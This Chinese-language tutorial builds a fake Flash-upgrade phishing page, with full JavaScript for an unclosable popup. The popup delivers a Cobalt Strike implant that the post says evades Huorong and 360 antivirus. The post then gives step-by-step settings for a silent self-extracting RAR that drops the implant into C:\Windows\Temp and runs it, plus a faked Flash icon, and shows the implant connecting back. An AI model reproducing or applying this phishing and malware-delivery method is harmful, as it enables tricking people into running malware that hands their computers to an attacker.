Flash钓鱼-＞CS上线(免杀过火绒、360等)

先看结果

访问钓鱼页面:

 点击立即升级即把马儿下载下来了

 这个马儿是rar压缩的，做成的rar解压自启动，所以是个exe的文件，然后这里为了像一点，把图标给改了

双击运行，查看效果：

首先CS是没东西的

解压路径现在也是没东西的

（

这里我把解压路径给改成了:C:\Windows\Temp

执行路径为:C:\Windows\Temp\Flash.exe

）

双击砸门的flash文件

 马尔已上线

---------------------------------------------------------------------------------------------------------------------------------

1、制作flash钓鱼界面

      1.1、flash.js

var s1 = document.createElement('script');
s1.setAttribute('type','text/javascript');
s1.setAttribute('src','//cdnjs.cloudflare.com/ajax/libs/jquery/2.0.0/jquery.min.js');
var head = document.getElementsByTagName('head')[0];
head.appendChild(s1);
s1.onload = function(){
    var s2 = document.createElement('script');
    s2.setAttribute('type','text/javascript');
    s2.setAttribute('src','//cdnjs.cloudflare.com/ajax/libs/layer/3.1.1/layer.js');
    head.appendChild(s2);
}
var s3 = document.createElement('link');
s3.setAttribute('type','text/css');
s3.setAttribute('rel','stylesheet');
s3.setAttribute('href','//cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css');
head.appendChild(s3);
var content = "
\u60a8\u7684flash\u7248\u672c\u8fc7\u4f4e\uff0c\u8bf7\u53ca\u65f6\u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c\uff01

\u7cfb\u7edf\u68c0\u6d4b\u5230\u60a8\u7684flash\u7248\u672c\u8fc7\u4f4e\uff0c\u6709\u88ab\u6f0f\u6d1e\u653b\u51fb\u98ce\u9669\uff0c\u4e14\u4e25\u91cd\u5f71\u54cd\u6e38\u620f\u3001\u89c6\u9891\u4f53\u9a8c\uff0c\u5347\u7ea7\u5230\u6700\u65b0\u5b98\u65b9\u6388\u6743\u7248\u672c\u83b7\u5f97\u66f4\u597d\u7684\u4e0a\u7f51\u4f53\u9a8c\u3002
"
        window.onload = function(){
            $(".layui-layer").css("background", "none");
            layer.open({
                type: 1,//Page层类型
                move: false ,//禁止拖拽
                area: ['613px', '324px'],//设置弹窗大小
                title: false,//关闭标题栏
                shade: 0.5,//遮罩透明度
                //maxmin: true ,//允许全与屏最小化
                closeBtn: 0 ,//取消关闭按钮
                anim: 0,//0-6的动画形式，-1不开启
                offset: '100px',//设置顶部距离
                scrollbar: false,//禁用滚轮
                content: content
            });
        }

        1.2、index.html

    
        
          
        
    
    
    
您的Flash版本过低！请重新安装...
    

       1.3、马儿

         这三文件放网站同一目录下即可

2、免杀

        

         这里就只有本地分离能免杀了，网络分离已免不了了

       3、将免杀的exe跟生成的PayloadFile进行压缩

        这里rar压缩的话做一个解压缩自启动（直接解压就执行我们的马儿）

            制作压缩自启动步骤如下：

                3.1、将要压缩的文件选中

                                常规->创建自解压格式文件

        3.2、 高级->常规->解压路径

                        这里路径放C:\Windows\Temp

                         这个路径每个windows都有，并且也有读写权限，方便砸门的马尔隐藏

        3.3、高级->设置->解压后运行

                这里路径跟解压路径对应的

                C:\Windows\Temp\Flash.exe

 

         3.4、高级->模式->静默模式->全部隐藏

 一个马尔的解压自启动的压缩包就做好了

 4、改图标

        这里砸门为了逼真一点，所以把这个压缩包的图标改成Flash的图标

        改图标的工具用的是:Resource Hacker

             第一步选择压缩包

        第二部选择我们要改的icon图标

 

 保存下来即可

5、将这个exe的压缩包的路径放在砸门服务器上的flash.js上即可